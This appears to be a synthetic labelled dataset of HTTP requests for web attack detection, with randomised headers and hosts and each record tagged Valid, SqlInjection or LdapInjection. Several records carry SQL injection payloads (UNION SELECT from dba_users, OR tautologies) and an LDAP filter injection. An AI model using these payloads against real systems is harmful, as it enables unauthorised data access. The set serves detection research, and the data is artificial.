Cookie: 3Hhtpassn=234149;agmailJvbscriptwT=fr;6yOqforms3mochaO=de0y;RxYkBY.6=3;nen709= ebSjeegrt1r
Cookie2: $Version="9"
Date: Mon, 12 Feb 07 24:05:59 GMT
ETag: "zAGMJ7nN7fRLQUz4e"
Expect: 8r0cEafD
From: ahipt@bhraulhaa.fr
If-Modified-Since: Thu, 22 Mar 07 06:12:00 GMT
If-Unmodified-Since: Tue, 07 Aug 07 05:00:09 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 04 Jul 09 12:32:02 UTC
Max-Forwards: 3
MIME-Version: 3.8
Pragma: ejoaH='unriehuh'
Proxy-Authorization: Basic dnRuamVzdGE6dGF0dGhlZQ==
Authorization: tuira ld19Si=equbAl
Range: 09626-1394,221800-
Referer: /iedea/nntew/ia94dI/easipwlN.avi
TE: trailers,gzip;q=0.2
Trailer: Accept-Encoding
User-Agent: coFsnl1c (axgwFfaq)
UA-CPU: StrongARM
UA-Disp: 9714,1631,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 552x034
Via: 6.8 www.grtd.gif, FTP/1.8 www.wnenCad.gif, FTP/7.2 www.1nnf3r.gif
Transfer-Encoding: gzip
Upgrade: omut/4.3, 2v0hp/4.8
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 153.184.197.192
X-Serial-Number: 835471798337
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17273
Start - Id: 30811
class: Valid
GET /8R@4CgQtbP9f/WIFMacceptnoDnullnH0LGk/hEh_K/dVPT/ehkt8d5ermeBn6ly/lleuomrp4uiek/NoyDAc8sZzV/eS_oTZqxol@61pxml/VGTQjzsyJek3location/eWaQI1-Uh6NQq4_70.tiff?Oatbpoa=47557&LdHxYn=8sizer%2BRt%3Ceetc%26r%3Agbs&mkp=eoi&C@K4FgLMTMn=masGy&Pnl=9969038&r5aeoalle=aoyherstseti&zgYt3tu8=5&ilocationHIinputPWj=ectadi&67wBuNM1Sz=ryKu&iats9=930&slderp9re=nsbaet8ssdmies&iweCic=ANue&htuoWbyeeprce=328&neosef=Ndu0setht3esip&PlEB=384 HTTP/1.0
Host: www.rersir8.gov
Connection: close
Accept: image/*, application/rtf;q=0.6, audio/*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: precso-rti
Cache-Control: e0=nw
Client-ip: 19.180.102.87
Cookie: eoTyzEe=yxr4~;logL2Pc8s=HbdHp3f1betnetsb;sBselcEa=cUw6pmcn6wrxro
Cookie2: $Version="2"
Date: Thu, 11 Mar 04 07:26:09 GMT
ETag: W/"lAopf6ffXu_8U.NL6R@"
Expect: nvtnnsoe
From: atr4n8@erh1g.biz
If-Modified-Since: Sun, 14 Mar 04 20:56:40 GMT
If-Unmodified-Since: Wed, 01 Mar 06 08:19:08 GMT
If-Match: *
If-None-Match: "Q7ArLioePZSDB0M"
If-Range: *
Max-Forwards: 6721
MIME-Version: 2.2
Pragma: pnih='ahser'
Proxy-Authorization: Basic YVNlYnNjYWc6YXROSTU=
Authorization: Basic aTJhbjo4ZWxzZW9hSw==
Range: 66262-55561,-1
Referer: /petStj/4sfebs1/a7nAcea.msf
TE: trailers,trailers
Trailer: Connection
User-Agent: iNihiyavNd/9.2
UA-CPU: PowerPC
UA-Disp: 384,8584,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 450x916
Via: FTP/4.6 www.tuuse9n.jpeg, oor/3.4 www.Edsstn.js, FTP/3.1 www.etdlyofw.jpeg
Transfer-Encoding: identity
Upgrade: q15f/6.4, ouaiqo/0.5, r3a/6.5
Warning: 313 www.hlalfjmb.js "rqeAssmteih" "Fri, 24 Mar 06 15:57:48 CET"
X-Forwarded-For: 37.25.72.3
X-Serial-Number: 277433290484890410
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 30811
Start - Id: 41495
class: SqlInjection
POST /eAjkBjL/nIQUPbH2PzC/obsdidowoNenlq/7Y0shHS1V/Srlaa/oc1K.aaawFOCQ0e./trSCM3He9muxeiteon/zHXfy@rTmDPYAQ/e2nuai7e3Vcecjte/nlocationyfromr.bin? HTTP/1.0
Content-Length: 154
Content-Language: QTa4heF,8o6Exaas
Content-Encoding: compress
Content-Location: http://www.9iq5.it/bhis9gsa/eancneEo/eciiw3c.pl
Content-MD5: eGxpcmxubG1jYnN1ZTBzaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Mar 10 18:36:01 GMT
Last-Modified: Fri, 18 Sep 09 22:14:03 UTC
Host: www.csely1.cz
Connection: close
Accept: text/*, video/quicktime;q=0.5
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: identity;q=0.2, identity;q=0.7, gzip, gzip, identity;q=0.5
Accept-Language: *
Cache-Control: max-stale=1
Client-ip: 221.158.6.21
Cookie: smabmitsCni=oIo0fZkmVQL;ZKkROO1openpR=4fs7nyieA;EuNipdGhCybei=dsno1deleteo;meearUthydiiH=uh3e8aDneoei7r;eeiaAwngcarnnfh=ld7S;drtouuzelHae=aemirrlet
Cookie2: $Version="965"
Date: Thu, 08 Mar 07 02:32:31 UTC
ETag: W/"GbgsfTwbeR.kqAvDGd7"
Expect: maEbbf
From: 8raL@hudstis9.fr
If-Modified-Since: Fri, 01 Sep 06 24:59:04 GMT
If-Unmodified-Since: Mon, 02 Feb 04 11:56:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 02
MIME-Version: 4.4
Pragma: xjtueY='Noa3a2d'
Proxy-Authorization: NTLM aTVjZGF0c1NkdG5yemVpd2xmVGVUOGVtbzdMaHB3aW5zZWV0ZWlhcnJhcmVleWE=
Authorization: Basic eHJlZWVJOnNuc2Ry
Range: 78-403185
Referer: http://osueq.be/ot2ls/ajnsheEe/jerg.gif
TE: deflate;q=0.9,trailers,gzip
Trailer: Upgrade
User-Agent: aFj8FP2jG@ http://www.sirmdmo.de
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: HTTP/0.8 www.welddp.shtml, 4.2 169.122.156.182
Transfer-Encoding: ibssb
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 111 www.Ieeee3e.gif "edowgieoaEca" 
X-Forwarded-For: 131.117.242.175
X-Serial-Number: 6237226305508453843
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

QyFjpsMaJb=a1r&YTFR=clI'/**/UNION/**/SELECT/**/jnsaO/**/FROM/**/dba_users/**/WHERE/**/he/**/like/**/'%25&eat0s=i

End - Id: 41495
Start - Id: 16625
class: Valid
GET /aisbaray/gmh1KjootUcL/tY14/N8rRhmDt7/9a5nosssfvfdnu/aBMbqR8hN5j0XD49Iong/havinguz8havingy/rezDretmm2k.html?ucfrwmmhrwoJsSl=4&rvi=aC%40kya&cnAestt9uMsNte9=vJhPAjf&wStjih4hhtr2=RtineesoehzaVtP HTTP/1.0
Host: www.oiiIt8.it
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: nate-oieibtsr, ms-a;q=0.0
Cache-Control: uthcxru='zroep'
Client-ip: 67.210.88.69
Cookie: tSttsn=1;aomoo=nctw96T6ts;EiduAhnewf3e=nrocwdita;ai=and;mhmete=egroup byi0V8a)xot8t
Cookie2: $Version="330"
Date: Tue, 03 Nov 09 24:28:34 UTC
ETag: W/"jan28hfMU5ZG@F7I@1"
Expect: 100-continue
From: oexheml@rD4eallw.gov
If-Modified-Since: Thu, 24 Aug 06 05:08:37 CET
If-Unmodified-Since: Wed, 26 Apr 06 06:49:53 GMT
If-Match: *
If-None-Match: "0w0kXxo9lfr7sANNOcES"
If-Range: Wed, 13 Feb 08 01:09:17 UTC
Max-Forwards: 21
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Ie30xo rqese=Ueloh7et
Authorization: Digest algorithm=MD5
Range: -51502,35-0418,-016
Referer: /nelmpiyd/fe9hlNym/dqdp.js
TE: trailers,deflate;q=0.7,deflate
Trailer: From
User-Agent: n5LTy@5c http://www.snEsenee.uk
UA-CPU: 68000
UA-Disp: 2902,213,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 702x893
Via: 2.8 148.99.206.135:68091
Transfer-Encoding: Efjsor; tlxat=teet
Upgrade: lte/0.8, ascmyo/0.4
Warning: 144 84.222.150.233 "udseldAuvnntiswe" "Tue, 18 Apr 06 02:19:07 UTC"
X-Forwarded-For: 2.103.180.182
X-Serial-Number: 6104122445139965688
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16625
Start - Id: 37890
class: LdapInjection
GET /7difeL1wNo/81AQHtrbCcqeQVUJJkkc/lmf3xaYfe10bDY/soFBuiLOrqHWUosbH/earfdD3adsnsieoaNti3/eqxgrP7qpKmJMNN/fOr57hNS/boot.iniNkuA/6p/nePu/uirxsx.aspx?ehkA=318&Knyoti=277851&gtoet2eesimat=r+&gmpr=rpBM_&frWm=66&en7euihet=10%29%28%26%28objectClass%3D9ow%29%28%7C%28sn+%3Dhsl%29%28cn%3Da++++J*%29%29 HTTP/1.0
Host: www.hOtIs9n7.org
Connection: coc7
Accept: */*
Accept-Charset: macintosh, windows-874;q=0.3, macintosh, windows-1253
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 64.67.93.181
Cookie: aesijls6ol=ohbno2nteiUeh
Cookie2: $Version="25"
Date: Wed, 13 Jun 07 09:57:35 CET
ETag: W/"k_eK26HPsis_XTtOs"
Expect: 4UHf=yc9Ggg;iOlgaObr=Elden
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Wed, 25 Nov 09 17:06:42 UTC
If-Unmodified-Since: Sun, 17 Jun 07 08:40:59 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 10 Nov 09 24:54:11 GMT
Max-Forwards: 3335
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic dWFlMDpEZHlhZW8=
Authorization: Digest nc=ebfc4BaD
Range: 77-8,-1840,4277-
Referer: /ot5wi/Goceeno/isb0atd/a4tn.html
TE: chunked;q=0.3,deflate,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.0 (compatible; MSIE 1.9; Mac OS X; t2LlBe7dHt)
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 3.5 58.173.241.206
Transfer-Encoding: gzip
Upgrade: tcig/4.0, RShRui/9.0, srvafl/9.7, nklzey/9.3
Warning: 062 148.228.41.113 "sStn" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 9686105266248523
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37890
Start - Id: 22487
class: Valid
GET /IwtefIch/zMh/iV0zizWC/uBzVGqeGLkeT2V6/c@DiOiVcBQ5LY5b/nH5CY@d7.jj4Pr5uF/fO.jpg?qoo=347&se=e1SHS&tet7att=44&lcatb6B7JHmd2S=925607&bEgGBK6=liuyjutaties&Croms=912&meahpwjiyd9=o_jj.Bq52&6Vxj9=7359&swqoec=ine+8&f0oerhts=Aury4gtsttthosHs&IJHrmLnX=Arn+2rmne&msesvsw91ooe=aWr&s8md=rCEF HTTP/1.1
Host: 147.148.10.255
Connection: lsam1
Accept: application/*;q=0.9
Accept-Charset: iso-8859-3;q=0.7
Accept-Encoding: compress, compress;q=0.7, compress;q=0.5, deflate
Accept-Language: efarr-me9o, kcsdfnCl-oqebej, hMhHo2r-oefh
Cache-Control: max-stale=045
Client-ip: 91.169.96.2
Cookie: qpStsios=xehya:ae ]ee;e65aet=iO@c:
Cookie2: $Version="99"
Date: Tue, 29 Sep 09 23:22:49 GMT
ETag: W/"W.yk0@rYrsjtVDROqvT"
Expect: 100-continue
From: oh5chbe@53nslitm.fr
If-Modified-Since: Sat, 31 Oct 09 20:44:47 CET
If-Unmodified-Since: Wed, 14 Feb 07 07:22:43 CET
If-Match: *
If-None-Match: "ngAm306CG-S4m.bMC"
If-Range: Fri, 18 Jul 08 06:23:38 UTC
Max-Forwards: 6099
MIME-Version: 0.3
Pragma: egbimntr='ed7g'
Proxy-Authorization: NTLM ZU5SdHQ2cmxtZHRERWVFZWViYXI1QUluYVAxSmhvZW1JMGd0
Authorization: NTLM TWVzYW50dWNnaGVuc3VSbmxyaGVvbHNlU2hoOWFibWg5YXJubHFqYmExZW9MTw==
Range: 625-,292-,328-8
Referer: http://www.rnpnto0.be/w7hsn/nC6a/4ysryeL/at0iunlA.js
TE: chunked;q=0.0
Trailer: If-Range
User-Agent: hLPv_I http://www.psd1.biz
UA-CPU: MIPS
UA-Disp: 392,629,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1822x173
Via: 8.6 www.yseg.js:40492, 9.6 39.234.227.226
Transfer-Encoding: lrnalh
Upgrade: leaHT/8.3, sdhsou/7.9, acol/9.0, ikfFc/4.1, 61ealm/2.2
Warning: 104 www.EecNi.tiff "ertuyoteiecEh" 
X-Forwarded-For: 30.145.163.171
X-Serial-Number: 5826747890581
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22487
Start - Id: 28447
class: Valid
GET /oNeOpur/dBCKq/hGc7qJqdq/pRTut76@pXV2_C.J/rdpihq/ttrgamtd/eeo/e4V.oCRtPE/Nadrn0ffthsxu/Efdong3caooeteie/sP/bPJb4Y42Piunmg3c.4.htm?pAusmdi=nj&cmdvbscriptYuPlzR=bpK-BMuzkf&oheei5=eeoe&u0yv=sma6mi HTTP/1.0
Host: 79.15.101.203
Connection: ae3ai
Accept: video/mpeg
Accept-Charset: isiri-3342;q=0.8, macintosh;q=0.9, iso-8859-2;q=0.5, windows-1251
Accept-Encoding: deflate, compress;q=0.8, identity;q=0.5
Accept-Language: *
Cache-Control: max-stale
Client-ip: 23.125.235.155
Cookie: ts17ra5=qqt6JBOJ;DwgDv8RQLZ=127791;tcFrtaa9S=eGkvz;oentl=0928
Cookie2: $Version="435"
Date: Sat, 23 May 09 10:05:01 GMT
ETag: "mccanSDjD7VajHTH-hd4"
Expect: tnrorhda
From: oBcae9t@txO3eond.biz
If-Modified-Since: Mon, 14 May 07 02:49:18 GMT
If-Unmodified-Since: Fri, 15 Feb 08 09:34:54 GMT
If-Match: "rwJPC4ozsqICuZ_"
If-None-Match: "S3G.27Tkb15nQW6u"
If-Range: *
Max-Forwards: 645
MIME-Version: 0.3
Pragma: 58=tlot
Proxy-Authorization: Digest nonce
Authorization: NTLM ZW5lbVduZG50dDFoaHRyaUlpc293ZWh6Y240YW9UZXlsMnQ=
Range: 571439-,36777-,4088-2
Referer: http://eitdd.biz/iwskz/udaoi/eea0vn/aSmoo.wav
TE: deflate;q=0.0,chunked;q=0.4,trailers
Trailer: TE
User-Agent: Nras (eBqlIQ_; lY2Z9Gcm; eBHks9dejv)
UA-CPU: Sparc
UA-Disp: 0681,480,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1655x3904
Via: 8.5 www.jsenetTt.tiff
Transfer-Encoding: compress
Upgrade: 6taars/5.3
Warning: 841 126.28.100.14 "srsst3tce" "Mon, 26 Mar 07 01:15:50 CET"
X-Forwarded-For: 34.125.43.206
X-Serial-Number: 032993654516042
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28447
Start - Id: 18888
class: Valid
GET /iiheg/aTilutynEsahnEtvmrT/asem2cpsA/wRN.htm? HTTP/1.0
Host: www.letjro.biz
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-4;q=0.5, x-mac-japanese, iso-2022-jp;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 234.213.186.59
Cookie: Otzlyrnc2S=same;Sv5Suapa=ikhP4;cUtsZhJahS=spaydio(cn
Cookie2: $Version="7"
Date: Fri, 26 Oct 07 18:44:45 GMT
ETag: "d0gxc9lfL-sJkju"
Expect: ttfdjerd
From: HiPzZ@7ede4.st
If-Modified-Since: Sat, 07 Feb 09 16:50:31 CET
If-Unmodified-Since: Wed, 13 May 09 18:09:01 CET
If-Match: *
If-None-Match: *
If-Range: "fNUcz6ns-md0plYAp5"
Max-Forwards: 2818
MIME-Version: 2.6
Pragma: Gesaoif=u2nois9
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM NmxneXZxU2lkZW9uSG9lc3JzMG51aDVlYWR5enRRS2JpZWp3bA==
Range: -47,36391-88404,16-
Referer: /esroyae/e1ehJ/iEs4Ynl/txuoiiC/r1scai.shtml
TE: gzip
Trailer: Cache-Control
User-Agent: Mozilla/6.8 (Machintosh; U; Mac OS X 2.6; r1-ea; rv:1.3.7) Gecko/18506051
UA-CPU: StrongARM
UA-Disp: 708,1125,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 592x5506
Via: 9.2 www.adyeOnS.gif, FTP/8.7 10.218.222.45, 4.4 158.59.58.70
Transfer-Encoding: deflate
Upgrade: nash0s/1.5, Xiiie/7.6
Warning: 226 www.njsira.shtml "3eahntvtanuw" 
X-Forwarded-For: 56.146.49.3
X-Serial-Number: 47230032
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18888
Start - Id: 41469
class: SqlInjection
POST /iCshutdown6Qnode/rA/d4ohjfftQ6sgs5ch/hZk3/8delete_Qtlocation/eK-6E.jpg? HTTP/1.1
Content-Length: 39
Content-Language: ehncE,PdjimnZ,hat5
Content-Encoding: gzip
Content-Location: http://gh5taIdh.uk/hiMNae.asp
Content-MD5: TmU3ZnNVMW9jZFNtdGhvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 10 Mar 09 24:02:02 UTC
Last-Modified: Sun, 19 Aug 07 23:07:20 UTC
Host: 99.6.223.29:80
Connection: enifzSht
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: ibli=a
Client-ip: 79.61.119.137
Cookie: ntathu0hatt8i=49;HhS5vfn=neu;i6qw=a=n;vbtuWoes=96589058
Cookie2: $Version="39"
Date: Wed, 01 Mar 06 23:33:52 CET
ETag: "WmWw5By6q9UJ5oawex"
Expect: 100-continue
From: utrstns@Temsn.st
If-Modified-Since: Thu, 09 Dec 04 03:52:25 CET
If-Unmodified-Since: Wed, 02 May 07 21:36:52 GMT
If-Match: "IMoV9M_MRk@qK@0cdtf2"
If-None-Match: "S0Pyek_HVBgIUaZC"
If-Range: Thu, 03 Jun 04 14:16:54 UTC
Max-Forwards: 0
MIME-Version: 2.7
Pragma: ne=taavEa
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: Digest username="syteln"
Range: 863-,45-,1-
Referer: /ux1Er/lwoweg/Rttbes/cd1noe/01aopS85.dll
TE: trailers
Trailer: Expect
User-Agent: fVkTxBE http://www.3Ntusawt.be
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 054x8213
Via: 5.3 www.z4ncmeee.js
Transfer-Encoding: gzip
Upgrade: EorNU/7.3, mot/1.8
Warning: 103 220.132.115.129 "d1xevs" 
X-Forwarded-For: 158.24.142.97
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

rnbtttruosiogn=OR   88409001=88409001

End - Id: 41469
Start - Id: 13555
class: Valid
GET /itsmiier/is2Aaotcehnecs1syt/nlf1tGJT.bin?fnj=rh%29t&ddfo6arlnse=62&anew4ex=o9patv&v20snXBtRe=uRv5Im&7gpodoe=bmgXFEp09&5hiwcetdnk9dq=stdinMsmochae&tpeHysM=utx&osaT6xl=lrjgx_%402qwu&toca=bidV5CS&nA=vhiaaewa+bo HTTP/1.0
Host: 25.97.131.72
Connection: keep-alive
Accept: application/*, video/mpeg;q=0.3, application/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 82.35.59.17
Cookie: 7irne=70;Igozaiht=62984259;qsdwotyeoavsmm=2939;3u8p=St2onsuayvl;ouhstap=06;aitni0chtMep=jhcopy)y
Cookie2: $Version="91"
Date: Wed, 27 May 09 18:06:15 GMT
ETag: W/"gQhz8jE0KLxYqpu"
Expect: 100-continue
From: ntyteei@sees9at.be
If-Modified-Since: Sun, 10 Aug 08 12:00:16 GMT
If-Unmodified-Since: Sat, 16 Dec 06 08:57:05 GMT
If-Match: "EUaKijTWnNaUP1c"
If-None-Match: *
If-Range: *
Max-Forwards: 83
MIME-Version: 9.1
Pragma: ijii8='yfd'
Proxy-Authorization: noxn uaenegsM=zmtlt
Authorization: Digest response="05aDdb32CcD93dcf828C40C2926cCd7C"
Range: 91-168
Referer: http://www.civadi9t.be/wmah1stt/arer.php3
TE: chunked,trailers,trailers
Trailer: TE
User-Agent: e5pKvYXt1 http://www.eqNo.cz
UA-CPU: x86
UA-Disp: 8631,7824,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1988x830
Via: 1.2 114.30.118.61
Transfer-Encoding: compress
Upgrade: teu/6.7, dj3/9.0, entsiy/1.9
Warning: 043 146.69.29.103 "pLtaauntea6teETrue" 
X-Forwarded-For: 156.12.70.0
X-Serial-Number: 70032554284651
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13555
Start - Id: 5283
class: Valid
PUT /ENfa2XlIhXEgL/elD/9.zo1cIri67/5scnitAaentgu/6YGrFbDiIP3@f@EBe/tyRrjaueg2lulNslg/yb3z.mdb? HTTP/1.1
Content-Length: 105
Content-Language: tirai
Content-Encoding: compress
Content-Location: /ei3nl4t.php4
Content-MD5: ZXNhaDdlY3BmYWVuNW1hQQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Aug 06 20:35:39 UTC
Last-Modified: Tue, 11 Mar 08 13:52:36 CET
Host: www.9Utt.be:4
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek;q=0.3, x-mac-chinesetrad;q=0.8, windows-1251;q=0.3, iso-2022-kr
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: n=h
Client-ip: 125.203.178.102
Cookie: iecrH1nlne=tn?s0;phn=oIc4LJo5
Cookie2: $Version="82"
Date: Tue, 13 Jul 04 18:11:54 UTC
ETag: "hVxHsrYAQqM_e7KE28G"
Expect: aoyzi
From: rpfz@tmadFbssh.cz
If-Modified-Since: Thu, 07 Oct 04 21:22:34 UTC
If-Unmodified-Since: Sun, 27 Apr 08 07:17:28 UTC
If-Match: "mS7cmJu.B-L.Hg6"
If-None-Match: *
If-Range: Fri, 07 Apr 06 02:15:04 CET
Max-Forwards: 5
MIME-Version: 1.6
Pragma: ete0noy='hibfgQ'
Proxy-Authorization: aghv eebTs=nisatc
Authorization: NTLM b25iZEFuSWVheW1ybmV3clJsbGVsMWFpMnJhYVRyY0hobzByc25jb2hUZWV0aA==
Range: 44-,39-,850121-
Referer: http://ifvuecT4.gov/iiltnsi.pl
TE: chunked
Trailer: If-Range
User-Agent: elefns
UA-CPU: PowerPC
UA-Disp: 507,781,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1146x7241
Via: HTTP/4.7 www.vtiLHest.js, 3.9 241.246.250.19:08841
Transfer-Encoding: 0fjsLc
Upgrade: ehpx5/0.0, arxncn/6.5, nwer/0.3, shn/9.2, otna/5.5
Warning: 731 183.237.250.141:0 "tuteLitohsstoT" 
X-Forwarded-For: 178.75.102.4
X-Serial-Number: 811738271596
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

efMifx=296217&rtAOsctx=52&nyOhBhrna2he=pan2hygIsae&eTefATidoyh=[lzmdocumentthtes7i<awaEM&J.dPM43wH=21

End - Id: 5283
Start - Id: 41412
class: SqlInjection
PUT /05i2GriIiUGuofrc/suQiMT59NRkC@bDyGDrB.swf? HTTP/1.1
Content-Length: 325
Content-Language: o,d,9oie
Content-Encoding: compress
Content-Location: http://tceIpN8o.fr/fd0ds/lamdNi/axcaDs9.swf
Content-MD5: aVNlc0xyaW10bVVkYXNucg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Apr 07 15:20:43 UTC
Last-Modified: Fri, 04 Apr 08 06:06:27 GMT
Host: www.63dtmWs.biz
Connection: keep-alive
Accept: image/png;q=0.5, application/*;q=0.7
Accept-Charset: x-mac-korean;q=0.8, cp-932;q=0.2
Accept-Encoding: identity;q=0.1, gzip;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 199.178.94.59
Cookie: 5Bdlbinse4to5Tx=2;hHsispe=sp8o4jifnsKIha;stmboicdaiartM=tmpa
Cookie2: $Version="59"
Date: Sun, 02 May 04 03:47:52 UTC
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: lmDa5=8ijgro;lbni3hs=iin2blna
From: cTensp@smyerSeiti.st
If-Modified-Since: Fri, 14 Oct 05 20:02:43 GMT
If-Unmodified-Since: Wed, 26 Apr 06 12:17:41 CET
If-Match: "uvdcNXV02-c.1moQC"
If-None-Match: "MBHk0t2FfH@tbD-G"
If-Range: Tue, 08 Sep 09 05:55:04 GMT
Max-Forwards: 3
MIME-Version: 2.2
Pragma: la=nkeDl
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: NTLM ZGR0aWRlc0lzeXRibmQ4bXRoYWJlZXljdTdBaWlyZWVlaQ==
Range: 24-
Referer: http://pshtAaaa.ch/Jtrvw/vs6tn/suiderc/ofsyrbes/iolys.tiff
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.9 (Windows; U; Win 9x 7.1; nl-sr; rv:5.8.8) Gecko/70897270
UA-CPU: MIPS
UA-Disp: 0223,7526,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1178x5140
Via: 1.4 www.thuScr.css:9, 9.7 0.189.119.128
Transfer-Encoding: gzip
Upgrade: etntne/4.1, Iossd/8.2
Warning: 632 www.ittuqan.jpeg "eesSloe6b" "Mon, 16 Aug 04 21:53:38 UTC"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 15055892627895380
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tehdA=nqYm.VwCV.mx&tcsretpdscsE=59526131&S8jservicesA=iid&1t=a_w8f5&bccEpA82aii9oo=')     UNION   ALL     SELECT    asgsts3o    , oee1d ,   vt2ECa   FROM    h0ueb     WHERE  hssiTe  NOT    IN ('ilidWla3ee'  )  AND  dRssotdnt    NOT     IN    (    'ehtke' )     AND     '' =   '&1tnddl=nhonphen

End - Id: 41412
Start - Id: 23821
class: Valid
GET /_C@owdZqG/ug4eDB.mQ6u/ei8Wvk/hrCd3oaahvrg/ug.9Ey@P6as-icO3YUt/rlhrtu7dngoena/eaP8eyy3t2zsnheeilq/gUdF5NM4i_60KT.jpg?ewssk=jHVW8LY&jxterm.juERk=he&hupoemRipynoj=9005282&mnat62wluoo9=57814&8O5VYl=in89serhrtit3emrb&qekdf99e81aca=o%5Ct6ba%24escript%40nph-&8zlc8zVE.=ieEztedQeoi425rte&eoauraeie=cfweR%40H&dhio=rncls&SogFA=81417510&es=71&rneit0cd=+encsock_stream+H2&Qmail3AHkQqWKdexec=05036 HTTP/1.0
Host: www.rwoiyee.biz
Connection: ernne
Accept: application/*
Accept-Charset: koi8-r, x-mac-korean;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=16
Client-ip: 1.109.180.253
Cookie: 7KyPN3K.5=ramKReaAdVkz;9t8eriR6aeee=ennae6xihtnowadtd;8XK-DUckv=2
Cookie2: $Version="022"
Date: Sat, 13 Jun 09 17:48:32 CET
ETag: "_fTGj4P-4-PABQ9"
Expect: iste5
From: dhmtihz@kNxat8.be
If-Modified-Since: Mon, 06 Mar 06 10:25:56 GMT
If-Unmodified-Since: Wed, 07 May 08 21:08:22 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 20 Oct 06 24:49:20 UTC
Max-Forwards: 143
MIME-Version: 8.6
Pragma: r=tw9achs
Proxy-Authorization: NTLM ckRTdG5mZXJvVXNvc2VvZ0cydGV4TG95MXJ4cmYyb2Zib25jaWNrZWV5YXJpMA==
Authorization: Digest algorithm=MD5-sess
Range: 7708-94,89-5,34-62
Referer: http://aqtiefp.org/mgso/o6ssll.nsf
TE: gzip;q=0.9,trailers,chunked
Trailer: Connection
User-Agent: tNbD (eBR4tEv; sY_UGH; e7neYUB@)
UA-CPU: PowerPC
UA-Disp: 6328,311,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4203x994
Via: s6rxz/9.3 233.191.88.226, 7.9 242.107.46.54:35, 8.2 www.trqleh.js
Transfer-Encoding: deflate
Upgrade: oetsn/4.0, airn/8.5, saerkt/9.9
Warning: 415 104.244.65.136:24988 "egaakabiuCnNesrOeG" "Mon, 26 Oct 09 01:44:24 UTC"
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 370786959520494
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23821
Start - Id: 21099
class: Valid
